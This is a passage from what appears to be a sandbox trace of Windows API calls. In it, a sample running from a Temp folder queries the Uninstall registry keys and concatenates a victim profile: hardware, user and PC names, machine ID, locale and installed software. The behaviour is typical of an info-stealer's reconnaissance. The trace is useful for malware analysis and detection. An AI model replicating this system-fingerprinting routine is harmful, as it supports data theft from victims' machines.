Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0" [0175.879] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n" [0175.879] RegCloseKey (hKey=0x354) returned 0x0 [0175.880] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x19, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.880] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 90 [0175.880] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.880] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x197fd4*=0x3d) returned 0x0 [0175.880] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned 60 [0175.880] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" [0175.880] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="12.0.30501.0", lpcbData=0x197fd4*=0xd) returned 0x0 [0175.880] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 " [0175.880] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0" [0175.880] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n" [0175.880] RegCloseKey (hKey=0x354) returned 0x0 [0175.880] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1a, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.881] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 90 [0175.881] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.881] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x197fd4*=0x43) returned 0x0 [0175.881] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned 66 [0175.881] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" [0175.881] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="14.25.28508.3", lpcbData=0x197fd4*=0xe) returned 0x0 [0175.881] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 